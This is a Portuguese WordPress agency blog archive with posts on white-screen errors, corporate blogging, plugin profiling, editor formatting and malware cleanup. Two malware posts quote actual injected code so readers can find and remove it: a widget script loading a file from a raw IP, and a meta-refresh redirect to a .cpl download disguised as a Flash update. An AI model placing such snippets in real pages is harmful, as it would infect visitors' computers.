Wordpress

Malware no Wordpress
Blog, Marketing Digital, Wordpress

Consertar o Erro da a Tela Branca WordPress

Você já usa o WordPress a quanto tempo? Eu Por exemplo, tive meu primeiro contato com a plataforma em 2011 era só um bloguinho. Digo, achei que seria mais um nada. Errei feio 🙂 se você já usa ele a um tempo sabe que ele possui um monte de bugs e ou erros.

Para quem já tem um tempinho usando o WordPress sabe que existem diversos erros que podem acontecer e um dos mais desesperadores é o da tela branca. Diferentemente de outros erros mais simples, um grande problema desse erro da tela branca é que você não consegue nem entrar no seu painel administrativo para desinstalar um plugin ou tentar ver o que pode ter dado errado para consertar. Eu Danillo Leite vou te ajudar, por que? Porque nós da iT9 Marketing também passamos por isso e meu time usa o site do it9 como base de conhecimentos.

Contudo, para deixar ainda mais confuso em algumas ocasiões quando temos a tela branca no WordPress ela só acontece em algumas partes do seu site. Às vezes você não consegue acessar o wp-admin, às vezes só consegue ver algumas páginas específicas e outras vezes tudo fica branco e não consegue abrir nada.

Nesse artigo vou te mostrar como consertar a tela branca do WordPress por meio de algumas possíveis soluções diferentes. Esse artigo tem como grande base as informações desse outro artigo do blog wpbeginner.

Por que Esse erro Acontece?

Se você está tendo o problema da tela branca é bem provável que seja um problema de memória. Mais especificamente a falta de memória. Isso pode acontecer por vários motivos mas em geral é algum plugin ou template que não está funcionando da maneira correta ou que exige um pouco mais de recurso computacional por natureza e requer um servidor melhor para rodar bem. Porém, também pode ser um erro das configurações do servidor e acaba que fica bem difícil determinar a razão exata da ocorrência. Depende muito de cada caso e eu conferiria esses três pontos nessa ordem na hora de buscar a razão:

  1. Plugins
  2. Template
  3. Servidor

O Erro Ocorre em Seus Outros Sites?

Se você possui mais de um site no mesmo servidor acho que uma das primeiras coisas que precisa fazer é conferir se os outros estão abrindo. Se os outros websites estiverem com problema também é bem provável que seja um problema com o servidor ou seu serviço de hospedagem. Já se somente um dos seus sites estão com a tela branca sugiro olhar para os plugins ou temas que estão ativos.

Soluções para Consertar a Tela Branca do WordPress

Importante: Sempre faça um backup do seu website antes de tentar fazer qualquer alteração abaixo.

Abaixo vou listar algumas das soluções possíveis. Sugiro tentar cada hora uma separadamente e ver o resultado no seu website ao invés de todas juntas ou uma depois da outra acumulando várias soluções. Dessa maneira você descobre exatamente como corrigir essa situação específica com seu website e saberá com mais agilidade consertar a tela branca da próxima vez.

Aumentar o Limite de Memória

Como mencionei acima, existe uma boa chance de ser um problema de memória. Então é natural que a primeira solução seja aumentar a memória. Existem duas grandes configurações de memória que precisamos nos atentar: memória do servidor e memória do PHP.

Alteramos a memória do servidor apenas quando esgotamos o limite que a memória do PHP pode ir (que naturalmente consome a própria memória do servidor mas tem como padrão valores bem inferiores do que a dos servidores).

Para alterar a memória do PHP precisamos alterar o limite padrão do WordPress. Em geral o WordPress tem 64mb como limite pré-estabelecido. Abra então o arquivo wp-config.php na raiz do seu website e adicione a linha abaixo logo antes da frase: /\\\\\\\* That's all, stop editing! Happy blogging. \\\\\\\*/.

define( 'WP_MEMORY_LIMIT', '256M' );

Esse código fará com que o limite suba para 256mb. Se a solução não funcionar para o aumento da memória, pode ser também que o seu serviço de hospedagem bloqueie essa ação. Aí a recomendação é entrar em contato com o serviço e pedir para que eles alterem o valor para você.

Desabilitar Todos os Plugins

Se aumentar a memória não ajudou muito para consertar a tela branca do WordPress ou se você tem algum tipo de limite de memória pelo plano contratado da sua hospedagem então vamos para a próxima opção que é entender a fonte do problema.

A melhor forma para detectar onde está o problema é desabilitando todos os plugins de uma vez só. Se esse processo fizer o seu website voltar ao ar então comece a habilitar um plugin de cada vez até identificar qual deles que deu o problema.

Consertar o Erro da a Tela Branca WordPress

Acompanho uma sugestão de ser bem cauteloso ao instalar plugins. Busque aqueles que são mais usados, possuem atualizações recorrentes e muitas avaliações. Avalie também plugins que gosta e aprova para ajudar outras pessoas que estão buscando. Além disso tente não exagerar na quantidade de plugins. Quanto mais plugins, mais lento o site acaba ficando.

Se você não tem acesso ao wp-admin então basta acessar seu site por FTP e mover todas as pastas dentro da pasta plugins dentro da wp-content para uma outra temporária que o WordPress automaticamente os desabilitarão. Então é só mover um a um de volta e ativar no painel administrativo.

Troca de Template ou Tema

Se após você desabilitar todos os plugins a tela branca do WordPress ainda está presente, então talvez seja um erro no template ou tema ativo. Selecione o template padrão do WordPress.

Se você não tem acesso ao wp-admin pode seguir um formato parecido com o que eu mencionei acima para os plugins, mas agora na pasta theme dentro da wp-content. Mova o template customizado que instalou para uma outra pasta temporária e o WordPress automaticamente ativará o tema padrão.

Caso isso funcione não precisa desistir imediatamente do seu template customizado. Primeiro tente acessar o arquivo functions.php desse template e confira se não tem espaços extras ao final do arquivo. Se tiver delete esses espaços, salve o arquivo e tente reativá-lo. Não dando certo é bem provável que o código do tema esteja com sérios problemas.

Consertar o Erro da a Tela Branca WordPress

Outras possibilidades de consertar a tela branca do WordPress

Se nada do que mencionei acima deu certo talvez seja o momento de buscar reinstalar seu WordPress com uma cópia nova. É pouco provável mas pode ser que houve algo na instalação que corrompeu sua cópia atual.

Algo que pode fazer, contudo, antes de ir até esse extremo é configurar o debug do WordPress no arquivo wp-config.php. Primeiro troque de false para true a linha abaixo:

define( 'WP_DEBUG', true);

em seguida adicione a seguinte linha acima dela:

error_reporting(E_ALL); ini_set('display_errors', 1);

Assim que fizer essas alterações pode ser que sua tela branca comece a mostrar erros e avisos. Essas notificações podem te ajudar a resolver o problema.

Uma outra possibilidade interessante que pode ajudar é com relação ao cache. Se você conseguir acessar a área administrativa e apenas a parte pública do seu site esteja com a tela branca tente esvaziar o cache através do plugin ou sistema que está usando.

Outro indício de problema no cache é se a tela branca está aparecendo apenas em posts com muito conteúdo. Tente limpá-lo e recarregue as páginas.

Concluindo

Sei bem como é frustrante lidar com os erros do WordPress e em especial com esse, mas espero que consiga consertar a tela branca do WordPress com essas dicas e sugestões acima. Se conseguiu resolver deixa aí um comentário ou se usou alguma outra dica nos conte para podermos expandir o artigo.

Divirta-se!

Minha empresa precisa ter um blog corporativo?
Blog, Desenvolvimento de Site, Redes Sociais, SEO, Wordpress

Minha empresa precisa ter um blog corporativo?

Realmente não importa o tamanho ou seu ramo de trabalho, um blog pode fortalecer e alavancar sua estratégia de marketing digital, consolidar sua marca e auxiliar na ampliação do seu alcance no mercado. Ou seja, você não deve ter um blog somente porque seu concorrente tem, nem depositar sua criatividade apenas em redes sociais. Separamos 5 bons motivos para a sua empresa ter (e acreditar!) Minha empresa precisa ter um blog corporativo?no blog corporativo. Minha empresa precisa ter um blog corporativo?

Minha empresa precisa ter um blog corporativo?

1. Ganhar posições nos resultados das buscas

Conteúdo original recorrente é combustível para suas estratégias de SEO. As ferramentas de busca como o Google reconhecem e premiam com posições melhores quem tem atualizações de conteúdo constantes. Manter somente o site da empresa, limitará o acesso apenas às pessoas que fazem buscas direcionadas à marca. Conquistando bons posicionamentos nas pesquisas, naturalmente o tráfego para o seu site aumentará. Nesse sentido, as redes sociais se tornam um canal para divulgação do seu conteúdo, não o destino final dele. Deixando o trabalho dos Backlinks muito mais potentes. Minha empresa precisa ter um blog corporativo?

Por que Minha empresa precisa ter um blog corporativo? Empreendo em um ramo tão abrangente como ganhar mais compradores ou conhecedores da minha marca?

2. Fazer um investimento duradouro e de baixo custo

Vamos começar falando sobre um dos assuntos mais importantes para as empresas: custos. E, no caso de um blog, eles podem ser mínimos. Existem muitas plataformas gratuita (o WordPress é um exemplo), que não requerem conhecimento muito avançado para instalar e começar a usar. Com um simples cadastro e um pouco de pesquisa é possível colocar no ar um blog interessante e atraente para seu público. Caso deseje ter menos trabalho, conte com a IT9 para auxilia-lo ou fazer todo o serviço árduo para você. Contato

Minha empresa precisa ter um blog corporativo?

Os posts não precisam ser publicados com muita recorrência, nem em volume intenso. Uma vez por semana é um bom começo. O importante é manter a frequência com disciplina. E quanto mais você publicar, mais páginas são criadas, mais atenção de clientes em potencial você vai atrair e melhor vai ficar a posição do seu site nos buscadores. Com uma campanha publicitária, se você deixa de investir, deixa de colher resultados. Já os posts no blog são permanentes: você recebe tráfego gratuitamente enquanto eles estiverem no ar. É ou não é um excelente negócio? Minha empresa precisa ter um blog corporativo?

3. Tornar-se referência em sua área

Você pode aproveitar o blog para tirar dúvidas dos clientes, falar sobre o mercado, comentar pesquisas ou notícias e publicar artigos educativos e informativos. Assim, seus leitores passarão a ter confiança na empresa e a marca ganha em credibilidade. Quando eles precisarem do produto ou serviço que você oferece, lembrarão da empresa que os informou e ajudou a tomar muitas decisões. Com uma boa biblioteca de posts, sua empresa pode se tornar também a fonte de referência em pesquisas naquele tema. Minha empresa precisa ter um blog corporativo?

4. Interagir com o público-alvo

Um blog é uma excelente ferramenta para estreitar relacionamento com seus clientes e conquistar outros. Ele cria uma conversa de duas vias, diferente dos padrões fixos do site. Um pequeno campo de cadastro pode permitir a inserção de e-mails, para envio de newsletters, que serão mais uma forma de interação com seus clientes em potencial. Com os posts, você pode incentivar interações, comentários, perguntas, feedbacks. Certifique-se, porém, de responder a todos. Mais uma dica: as perguntas dos leitores nos comentários podem gerar temas para novos posts! Minha empresa precisa ter um blog corporativo?

5. Conhecer seus clientes e aprimorar a estratégia de conteúdo

Movimentar seu site com conteúdo através de um blog aos poucos permite colher informações preciosas para a empresa. Análises periódicas podem ajudar a descobrir quais são os temas mais populares, como os visitantes chegam à sua página, de onde eles são, quais as palavras-chave mais buscadas e muito mais. Essas métricas ajudam a aprimorar sua estratégia de marketing de conteúdo e alinhá-la aos objetivos de negócio. Minha empresa precisa ter um blog corporativo?

E então, pronto para começar um blog para sua empresa? E se você já gerencia o blog de uma empresa, conte para a gente as vantagens que você já identificou! Confira também os primeiros passos para a criação de um blog corporativo.

Post produzido por um redator profissional da base da Contentools – Marketing de Conteúdo.

Minha empresa precisa ter um blog corporativo? o que você acha? Comente.

P3 plugin performance profiler
Blog, Wordpress

Descubra quais plugins estão deixando seu WordPress mais lento!

Uma instalação padrão do WordPress é muito boa em carregar páginas muito rapidamente. Esta é uma decisão proposital da equipe de desenvolvimento, para manter o núcleo rápido e deixar as funções não essenciais para os plugins, para que as pessoas que não precisam dessas funções não sejam retardadas por elas e as utilizem apenas se optarem.

Com isso dito, a maioria das pessoas começa imediatamente a tentar instalar alguns plugins para obter a funcionalidade que eles estão procurando. À medida que você começar a construir seu site e vai adicionando plugins, você pode não perceber imediatamente os milésimos de segundo aqui e ali que cada plugin adiciona a seu tempo de carregamento.

Se você notou que a velocidade da página está ficando um pouco lenta (ou se você nem sequer considerou), pode valer a pena fazer uma auditoria para ter uma idéia de quais dos seus plugins estão adicionando mais para o seu site o tempo de carregamento. Ironicamente, isso será feito como uso de um plugin. Este chamado de: P3 Plugin Performance Profiler.

P3 Plugin Performance Profiler

P3 Plugin Performance Profiler é um ótimo plugin desenvolvido pela GoDaddy.com que você pode ativar apenas para fazer esta auditoria e, em seguida, desativá-lo quando terminar de afinar o seu site, para que ele não seja mais um plugin ativado a afetar a velocidade geral do site.
P3 Plugin Performance Profiler

Realizando a auditoria

Uma vez instalado o plugin(P3 Plugin Performance Profiler), você encontrará a tela do plugin no menu Ferramentas. A interface de usuário é muito bem organizado e de fácil navegação. Para executar a sua primeira avaliação, aperte o botão Start Scan. Uma vez que feita a varredura automática, ele irá passar por um processo de carregamento de um bom número de suas páginas e avaliar o tempo de carregamento de cada um, o que irá levar um cero tempo, portanto tenha paciência, não se faz uma auditoria correta sem uma amostragem satisfatória 🙂

Compreendendo os resultados do P3 Plugin Performance Profiler

Quando a verificação terminar, você poderá visualizar os resultados da verificação. No topo da tela de resultados, você obtém informações sobre quantos plugins você tem, quanto tempo demorou para carregar todos eles e qual a percentagem da sua velocidade de carregamento da página é atribuível a plugins. Nos testes feitos no TudoParaWordPress, apenas 19,45% do carregamento do site é afetada por plugins (utilizamos 11 plugins e 5 deles para tarefas no backend, para o administrador ligado, portanto o site visitado pelo usuário se utiliza de apenas 6 plugins), mas em testes feitos em site de amigos (que pediram para não revelar detalhes sobre seus sites), chegamos a até 70%, concluindo que tais sites são cerca de 4 vezes mais lento do que era quando o WordPress foi instalado pela primeira vez sem plugins e muitos dos plugins utilizados poderiam ser substituídos por funcionalidades desenvolvidas especificamente para as funções desejadas.

O gráfico em pizza vai lhe dar uma representação visual dos plugins mais pesadas (cada fatia que representa uma porcentagem do tempo total plugin de carga). Conforme falamos anteriormente, é interessante você observar qual plugin(P3 Plugin Performance Profiler) realmente impacta no carregamento do front-end do site. Por exemplo, se você utiliza o WP Smush.it para otimizar imagens, ele aparecerá no relatório, mas este apenas é utilizado quando um editor sobe uma imagem em seu servidor pelo uploader de imagens do WordPress, não afetando o carregamento de seu site.

Se você clicar sobre a guia Detailed Breakdown, você pode passar o mouse sobre cada barra do gráfico e ver o tempo de carregamento real para cada plugin( P3 Plugin Performance Profiler). As guias restantes fornecem informações adicionais sobre como cada página que foi utilizada no teste, uma comparação entre o tempo de carregamento do núcleo do W, o tempo de carregamento do tema e tempo total de carregamento dos plugin, quantas consultas SQL foram necessários para carregar cada página e outras métricas.

Hora para uma mudança?

Uma vez que você executou a verificação em seu site e observou os resultados, você está em uma boa posição para tomar uma decisão para decidir o que fazer com o seu site para melhorar sua performance. Reveja os plugins mais pesados e decida se você realmente precisa deles. Se você não consegue viver sem eles, talvez haja um plugin diferente ou até um snippet legal para o substituir, mais leve e que ainda consiga a mesma funcionalidade.

Fez os testes? Compartilhe conosco!

Quantos plugins seu site utiliza? Qual o impacto dos mesmos no carregamento do seu site (Plugin Load Time e Plugin Impact)?

Malware no Wordpress
Blog, Wordpress

Malware no WordPress 2

Ultimamente parece que virou moda, quase todo mundo está com problemas de malware no wordpress. Por que isso está acontecendo?
As variáveis são muitas. Pode ser um plugin, pode ser alguma linha de código no seu theme (ou algum outro theme que tenha na pasta de themes), pode ser falha de segurança do servidor, pode ser que sua senha é muito fácil de descobrir..

Como evitar malware no wordpress?

Malware no WordPressNão posso dizer que isso vai te ajudar 100% a nunca mais ter esse problema, mas aí estão algumas dicas:

  • Desativar no painel do WordPress todos os plugins que não estão sendo usados
  • Deletar do FTP todos os plugins que não estão sendo usados
  • Deletar do FTP todos os themes que não estão sendo usados
  • Alterar a senha do FTP e do painel de controle do WordPress pelo menos uma vez ao mês
  • Deletar arquivos do FTP que não esteja usando para nada, mesmo que sejam apenas imagens
  • Atualizar plugins*
  • Atualizar seu WordPress*
  • Deletar os arquivos Readme.html e Lincence.txt para evitar malware no wordpress.

* Sempre fico com um pé atrás com novas versões do WordPress e de plugins (é muito comum gerar erro na atualização). Geralmente espero pelo menos uma semana depois para atualizar e mesmo assim faço backup geral antes.

Uma outra coisa que recomendo, é remover a função wp_generator que é padrão do WordPress. Essa função gera no código fonte do seu theme a versão do WordPress que está usando. Isso pode tornar você um alvo fácil, principalmente se você não está usando a última versão do WordPress.

Para saber se seu theme está gerando isso no código, veja no código fonte se encontra algo assim:

<meta name="generator" content="WordPress 3.6" />

O número 3.6 é a versão do WordPress que você está usando. Então se estiver usando outra versão, terá outro no lugar.

Para remover o wp_generator, adicione o código abaixo no arquivo functions.php do seu theme:

remove_action('wp_head', 'wp_generator');

Se não remover isso com a linha de código acima, é por que provavelmente foi inserido manualmente. Então abra o arquivo header.php do seu theme, procure pelo código e delete.

Evite usar plugins

Muita gente acha que isso não tem nada a ver. Já li vários artigos sobre o assunto, alguns dizem que é muito mais seguro, outros dizem que não.. uns dizem que pesa muito no banco de dados, outros dizem que não..

Eu evito. Só uso se não tiver escolha. Por que?
Por que não conheço quem fez o plugin, não sei qual a intenção dessa pessoa. Às vezes sem querer ela pode usar algo lá que vai ser um problema enorme daqui uma semana.
Então quando posso, faço do zero, crio o código eu mesma, por que se aparecer problema, eu sei o que fiz e posso tentar resolver (ou desistir.. rs) e obviamente não uso código malicioso nenhum nos meus códigos, tanto que aqui no Difluir e nos outros domínios que já tive, nunca peguei malware no wordpress. E espero continuar assim.

Malware no Wordpres, socorro.

É claro que não são todos os plugins com problema, ou o WordPress já era.
Mas baixe plugins direto do site do WordPress.org e não faça download de outros sites que encontra pelo google. E na dúvida, pesquisa sobre o plugin que quer usar, você sempre vai encontrar pessoas comentando a respeito, se é bom ou não, se teve algum problema.

E se possível não use tantos plugins. Use apenas se você realmente precisa e não sabe fazer de outra forma.
E não use mais de um plugin que faz a mesma coisa. É muito comum eu pegar um job e ter uns 3 ou 4 plugins para a mesma coisa e geralmente estão todos ativados. Entro pânico quando vejo isso.
Esses plugins que fazem a mesma coisa, podem gerar conflito e dar erro, e ou pode deixar seu código sem validação, principalmente aqueles de SEO. Não tem por que você ter 2 plugins para SEO. Um plugin é suficiente.

Mas já tem mensagem de malware no wordpress, como resolver?

A maioria das hospedagens tem opção para recuperar backup ou algo assim. Você pode entrar em contato com o suporte e ver se eles podem colocar o último backup feito, antes da mensagem de malware no wordpress.
Mas de qualquer forma é bom você dá uma organizada nos seus arquivos.

Malware no wordpress.

Pelo que tenho notado, estão usando plugins e themes padrão do WordPress como base para ataques. Então recomendo que dê uma olhada em cada arquivo dos themes e plugins que tem no ftp e ainda olhe os arquivos do WordPress que tem na raiz da instalação. Se você encontrar um código enorme com várias letras e números juntos, é ele mesmo, só deletar, salvar o arquivo e subir novamente para o ftp.

Mas em alguns casos isso não resolve, por que pode ter esse código em outros arquivos do WordPress ou pode ser mesmo falha em algum código que está permitindo a invasão. Então o melhor é verificar apenas o theme que está usando, fazer backup do banco de dados e da pasta de uploads (wp-content/uploads). Depois deletar tudo e instalar novamente do zero.

Se você resolver instalar do zero e manualmente, recomendo que baixe o WordPress direto do wordpress.org, na versão em inglês.
Para evitar baixar um malware no worpress… Um wordpress já batizado. 

Malware no wordpress escondido nos WIDGETS

Reparei também que muitas vezes, o malware no wordpress coloca os cóigos na barra de Widget. Como texto/html

Assim: <script src="http://216.92.7.75/br/flashplayer"></script

Escreva abaixo se conhece outros ou se tem soluções diferentes.

PS: RECOMENDO O PLUGIN  Better WP Security Contra diversos problemas no WordPress inclusive malware no wordpress.

Malware no Wordpress
Blog, Wordpress

Google – Seu site está infectado com Malware

Malware

No Seu wordpress foi modificado?
Está redirecionado para outro site ou pior para um link com um arquivo infectado?

Malware

no WordPress

O google te disparou um alerta e agora, o Google não deixa seus visitante entrarem no seu site… dizendo que está infectado por um Malware? Que cliente voltaria a acessa-lo?Malware no WordPress

O Google detectou que algumas páginas de seu site http://www.seusite.com.br/ podem infectar os computadores dos usuários com software destinado a acessar informações confidenciais (malware) ou até mesmo danificar os computadores.

E mais, que o Google Adwords bloqueou todos os anuncios deste cliente. Obvio por causa do malware.

Tive o disprivilégio de isso acontecer comigo. Em um site de um cliente.
Todos que tentavam acessar o Google colocava um aviso ou no Google Chrome aparecia uma tela vemelha… dizendo vá embora… aqui é perigoso. Este site instala um software que pode danificar seu computador (malware).

O wordpress desse cliente estava intacto, mas quando você acessava o site (mesmo o admin) era redirecionado para o dominio http://www.premiado2013.com.br, no link: http://www.premiado2013.com.br/install_reader11_br_mssa_aaa_aih.cpl .

Cruel pois é um script mal intencionado. Fora a mensagem que dizia que o Flash iria ser atualizado automaticamente. (isso em POP-UP).

'Este site Requer Adobe® Flash® Player 2013, O download Automaticamente Será iniciado'

 

Analizando o ocorrido, ele alterou alguns arquivos do WordPress: Index.php, wp-activate.php e wp-blog-header.php tudo na rais do WordPress.

Após as analizes para ver o estrago, foi fácil resolver.
Só apagar esta linha

"<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW">
<meta http-equiv="REFRESH" content="2;url=http://www.premiado2013.com.br/install_reader11_br_mssa_aaa_aih.cpl">
<script type="text/javascript">
alert('Este site Requer Adobe® Flash® Player 2013, O download Automaticamente Será iniciado');
</script>
</script>
</body>"

dos arquivos modificados.

Não sei dizer como isso foi feito.

Estou monitorando e deixo vocês atualizados sobre novas informações.

Abraços.

Link Solicitar Verificação do Google: Clique aqui

E voce já passou por isso? sabe a solução para esse malware?  tem idéia de como ele pode ter alterado meus arquivos? deixe seu comentário.

Contratos de Manutenção
Blog, Desenvolvimento de Site, Wordpress

Tabelas, quebras de linha e problemas de formatação de texto no WordPress

WordPress

WordPress

Quem tem um mínimo de experiência no WordPress já deve ter descoberto que o editor dele (TinyMCE para WP) não dá suporte, elimina ou desconfigura completamente as tabelas, às vezes até mesmo aquelas inseridas à mão no código HTML.

Dando uma grande dor de cabeça em certos casos. Pois as páginas e o blog não seguem a estrutura que você ou o editor desenvolveu na Publicação.

WordpressHá três formas para se resolver isso: baixando a versão full do TinyMCE, instalando um plugin para fazer aparecer os botões de tabelas no MCE, ou trocando definitivamente ele pelo CKEditor, que é o editor WYSIWYG mais usado no mundo hoje. Recomendo fortemente esta última opção, pois o CKEditor é muito mais completo, flexível e fácil de usar que o TinyMCE.

Outro problema muito comum é a QUEBRA DE LINHA: Ao inserir um post com alguma formatação e uma quebra de linha normal (enter) logo depois, o editor salva corretamente, mas na próxima vez que for editar a postagem, está tudo grudado de novo. Sem falar em diversos problemas com alinhamento de imagens, perda de formatação de texto, etc, etc. O CKEditor também corrige praticamente tudo isso.

Depois de instalar o CKEditor, 90% dos problemas de formatação do WordPress estão resolvidos. Para o restante, basta procurar na Web sua dificuldade específica e certamente já haverá um plugin para resolver isso também.

Já passou ou passa por algum problema deste tipo? Por favor comente abaixo. Se ainda estiver passando por isso, nossa equipe terá o prazer de ajuda-lo com seu problema.

Caso deseje contratar nossa equipe. Podemos gerenciar seu processo:

Instalação do WordPress
Instalação de Temas
Instalação de formulários de contato
Instalação Plugins
Gerenciamento de Desempenho
Gerenciamento e implantação de SEO
Google Analytics para acompanhamento de estatísticas de visitas do Blog
Monitoramento para que a saúde de seu Blog seja sempre a melhor possível.

Wordpress

Configurando o WordPress para inserir Imagem sem LINK

Configurando o WordPress para inserir Imagem sem LINK

Configurando o WordPress para inserir Imagem sem LINK

Ao inserir imagens no blog WORDPRESS, eu raramente tenho a necessidade (e eu duvido que outros também) do link para a imagem Grande, Aberta só a imagem. Eu odeio a tarefa repetitiva de selecionar ‘Nada’ da mídia ‘link’ drop-down.

Cansei de procurar, onde colocar sem LINK por padrão as Imagens, quando vou inseri-las em meus Posts ou páginas.

Configurando o WordPress para inserir Imagem sem LINK

1
update_option('image_default_link_type','none');

Basta colar essa linha no final do arquivo que você está “functions.php” do seu tema atual, atualize e trabalho feito! Agora, ao selecionar a imagem a ser inserida, o ‘link’ padrão está configurado e fixo em NENHUM assim apenas quando quiser colocar um link você coloca.

Pode, claro, definir o ‘link’ drop-down com as outras opções disponíveis para “URL personalizada ‘,’ Media File ‘,’ Anexo Pagina ‘e​​’ Nenhum ‘, alterando o segundo parâmetro na função UPDATE_OPTION para’ custom ‘, ‘file’, ‘post’ ou ‘none’.

Sabia disso? Gostou disso? Quer mais alguma dica?
COMENTE!! por favor

 

abs

gravatar
Blog, Wordpress

Gravatar – Plugin User Photo Imagem ao seu Usuário no WordPress

Gravatar

Gravatar

Conheça aqui um plugin muito simples que o ajudará a inserir uma foto associada ao seu perfil no WordPress.

Se você utiliza o WordPress e deseja que uma imagem sua esteja associada ao seu perfil no site, página, artigo ou comentário, você pode utilizar o plugin User Photo para adicionar esta imagem, que pode ser uma foto, um avatar, um gravatar ou qualquer outra imagem, que ficará vinculada ao seu nome ou usuário.

O plugin User Photo permite que um usuário do WordPress adicione uma imagem ao seu perfil através do próprio administrador do WordPress, no Menu Usuários>Seu Perfil.

É muito simples. Basta procurar pelo plugin através do próprio administrador, digitando “User Photo”. O plugin é o que possui somente este nome mesmo. Então basta baixar, instalar e ativar o plugin.

Feito isso, vá a té o menu Usuários>Seu Perfil e lá você encontrará um campo chamado “Sua Foto” onde você poderá adicionar uma imagem, carregando-a do seu computador para o WordPress.

Enviada a imagem, basta ajustar as configurações do plugin, definindo o tamanho da imagem exibida, local e forma de exibição, etc, clicando n0 Menu Configurações>User Photo.

Para trocar a imagem exibida, basta excluir a existente e enviar uma nova imagem  nas configurações do seu perfil.

A imagem ou foto associada ao seu usuário ajudará o leitor a ter uma ideia de como você é, criando assim mais empatia, o que pode ajudar bastante o seu site, caso ele seja um site pessoal ou um blog.

gravatar